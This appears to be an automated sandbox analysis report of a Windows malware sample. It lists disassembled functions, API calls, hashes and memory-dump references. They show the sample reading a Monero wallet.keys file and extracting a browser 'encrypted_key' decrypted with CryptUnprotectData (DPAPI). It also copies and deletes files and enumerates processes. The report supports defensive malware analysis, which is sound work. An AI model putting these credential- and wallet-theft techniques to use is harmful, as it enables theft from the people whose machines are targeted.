                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: ed89edd06c491f94146761d61dfcdbf5ce098ce2c5b1c8154962b35878b5921c
                          • Instruction ID: 1ec74102a9189d2078bbe474528eeab3f6b5d5148e68fdc48e7c5736dc2970ba
                          • Opcode Fuzzy Hash: ed89edd06c491f94146761d61dfcdbf5ce098ce2c5b1c8154962b35878b5921c
                          • Instruction Fuzzy Hash: 8EE046B2A40208BBC701DF94DC0AA697BACEB0A702F000094F90986280DA759A008B92
                          Function 0016A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 00178B60: GetSystemTime.KERNEL32(00180E1A,00CCEEF0,001805AE,?,?,001613F9,?,0000001A,00180E1A,00000000,?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 00178B86
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0016A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0016A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0016A6BC
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0016A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 7d9913b539cbea182d4cb640df916791fa2b0cfe074278f8eabb5c5334dc1e50
                          • Instruction ID: 87bd17a37fa52daee5dba688e421a8e45cdffae5e4be75f5e780b50515579d57
                          • Opcode Fuzzy Hash: 7d9913b539cbea182d4cb640df916791fa2b0cfe074278f8eabb5c5334dc1e50
                          • Instruction Fuzzy Hash: AEE1CF728501189BDB05FBA4DC92EEE733CAFA4301F90C169F51A76091EF346B59CB62
                          Function 0016D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 00178B60: GetSystemTime.KERNEL32(00180E1A,00CCEEF0,001805AE,?,?,001613F9,?,0000001A,00180E1A,00000000,?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 00178B86
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0016D481
                          • lstrlen.KERNEL32(00000000), ref: 0016D698
                          • lstrlen.KERNEL32(00000000), ref: 0016D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0016D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: fe715aac5f1964b0868055ba50f5767f57c6d5de7fa1a0a859d8ff585b96188a
                          • Instruction ID: 8532f78767d8195d66d513d2e31c8dfc6efb0c80c4d3b81c83b24711b01178f7
                          • Opcode Fuzzy Hash: fe715aac5f1964b0868055ba50f5767f57c6d5de7fa1a0a859d8ff585b96188a
                          • Instruction Fuzzy Hash: AE9104729101089BDB05FBA4DC96DEE733CAFA4305F90C169F51BA6091EF346A49CB63
                          Function 0016D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 00178B60: GetSystemTime.KERNEL32(00180E1A,00CCEEF0,001805AE,?,?,001613F9,?,0000001A,00180E1A,00000000,?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 00178B86
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0016D801
                          • lstrlen.KERNEL32(00000000), ref: 0016D99F
                          • lstrlen.KERNEL32(00000000), ref: 0016D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0016DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 381197fad15b1e153ae7e5591db2caf3c39a6f5f73652054e1d1de5cd641797f
                          • Instruction ID: 41ed828b37c935754a2cbe3518e89612064a02e947ecb77724a9a50b5f06fcf5
                          • Opcode Fuzzy Hash: 381197fad15b1e153ae7e5591db2caf3c39a6f5f73652054e1d1de5cd641797f
                          • Instruction Fuzzy Hash: 808103729101089BCB05FBA4DC56DEE733CAFA4305F908529F51BA7091EF346A59CBA3
                          Function 0016F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001699EC
                            • Part of subcall function 001699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00169A11
                            • Part of subcall function 001699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00169A31
                            • Part of subcall function 001699C0: ReadFile.KERNEL32(000000FF,?,00000000,0016148F,00000000), ref: 00169A5A
                            • Part of subcall function 001699C0: LocalFree.KERNEL32(0016148F), ref: 00169A90
                            • Part of subcall function 001699C0: CloseHandle.KERNEL32(000000FF), ref: 00169A9A
                            • Part of subcall function 00178E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00178E52
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00181580,00180D92), ref: 0016F54C
                          • lstrlen.KERNEL32(00000000), ref: 0016F56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 71b48da28d885dfbeba572220aa5a676bc0ed1952f653ed52670e223ce6d0ca6
                          • Instruction ID: 6c5337f757beaae175ed915ca73343f5af54604a4e0f6063c6bd274415f770d9
                          • Opcode Fuzzy Hash: 71b48da28d885dfbeba572220aa5a676bc0ed1952f653ed52670e223ce6d0ca6
                          • Instruction Fuzzy Hash: 7351D471D10108AADB04FBB4DC56DEE7379AFA4305F80C528F51A67191EF346B19CBA2
                          Function 00173560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 15844fe7f100ebe3fd601ba2c75fff6a751a216e1988d5ad9790a1734a23f34a
                          • Instruction ID: f52afc7b01b09a158164181295877116b0b766c707ef7f7d2cd09c3b5cd78e07
                          • Opcode Fuzzy Hash: 15844fe7f100ebe3fd601ba2c75fff6a751a216e1988d5ad9790a1734a23f34a
                          • Instruction Fuzzy Hash: E5415171D10109ABCB09EFA4D845AEEB778AF58304F40C418F52A77290DB35AB49DFA2
                          Function 00169CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 001699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001699EC
                            • Part of subcall function 001699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00169A11
                            • Part of subcall function 001699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00169A31
                            • Part of subcall function 001699C0: ReadFile.KERNEL32(000000FF,?,00000000,0016148F,00000000), ref: 00169A5A
                            • Part of subcall function 001699C0: LocalFree.KERNEL32(0016148F), ref: 00169A90
                            • Part of subcall function 001699C0: CloseHandle.KERNEL32(000000FF), ref: 00169A9A
                            • Part of subcall function 00178E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00178E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00169D39
                            • Part of subcall function 00169AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00164EEE,00000000,00000000), ref: 00169AEF
                            • Part of subcall function 00169AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00164EEE,00000000,?), ref: 00169B01
                            • Part of subcall function 00169AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00164EEE,00000000,00000000), ref: 00169B2A
                            • Part of subcall function 00169AC0: LocalFree.KERNEL32(?,?,?,?,00164EEE,00000000,?), ref: 00169B3F
                            • Part of subcall function 00169B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00169B84
                            • Part of subcall function 00169B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00169BA3
                            • Part of subcall function 00169B60: LocalFree.KERNEL32(?), ref: 00169BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 5ea9ad89d69721b070024daf7a289ebdc62124fadd7ac00e80234c76812718bd
                          • Instruction ID: 8804643b6028ee165ec2021e0669bc2a43b7bc9bc7541a28cf3017e83061a6a6
                          • Opcode Fuzzy Hash: 5ea9ad89d69721b070024daf7a289ebdc62124fadd7ac00e80234c76812718bd
                          • Instruction Fuzzy Hash: 07314FB6D10209ABCF04EBE4DC85AEFB7BCAF58304F144529E905A7241EB349A15CBA1
                          Function 00178680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001805B7), ref: 001786CA
                          • Process32First.KERNEL32(?,00000128), ref: 001786DE
                          • Process32Next.KERNEL32(?,00000128), ref: 001786F3
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • CloseHandle.KERNEL32(?), ref: 00178761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: e99e9b582d43c1e069650fdb29c9ab33d3800ee143f838d4c180a34760aba6cc
                          • Instruction ID: 13ae7df500ec9d0abd1705476fe47b757071308a8c2720ccb8ade9e8b930047b
                          • Opcode Fuzzy Hash: e99e9b582d43c1e069650fdb29c9ab33d3800ee143f838d4c180a34760aba6cc
                          • Instruction Fuzzy Hash: BC315C71941218ABCB29EB94CC55FEEB778EF55701F508199A10EA21A0DB306B45CFA2
                          Function 00177980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00180E00,00000000,?), ref: 001779B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 001779B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00180E00,00000000,?), ref: 001779C4
                          • wsprintfA.USER32 ref: 001779F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 77149ac084d2586a277e4c256211b992114cbf572ac52d1dae9ce9dbe6b401d4
                          • Instruction ID: a632a87d994617cf8c14ad42bd8395f63222ee428787fbc1ec1e11bd2b3f7116
                          • Opcode Fuzzy Hash: 77149ac084d2586a277e4c256211b992114cbf572ac52d1dae9ce9dbe6b401d4
                          • Instruction Fuzzy Hash: F01115B2904518AACB149FC9ED45BBEBBFCEB49B11F10421AF605A2290E3395940CBB1
                          Function 001792E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00173AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00173AEE,?), ref: 001792FC
                          • GetFileSizeEx.KERNEL32(000000FF,00173AEE), ref: 00179319
                          • CloseHandle.KERNEL32(000000FF), ref: 00179327
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
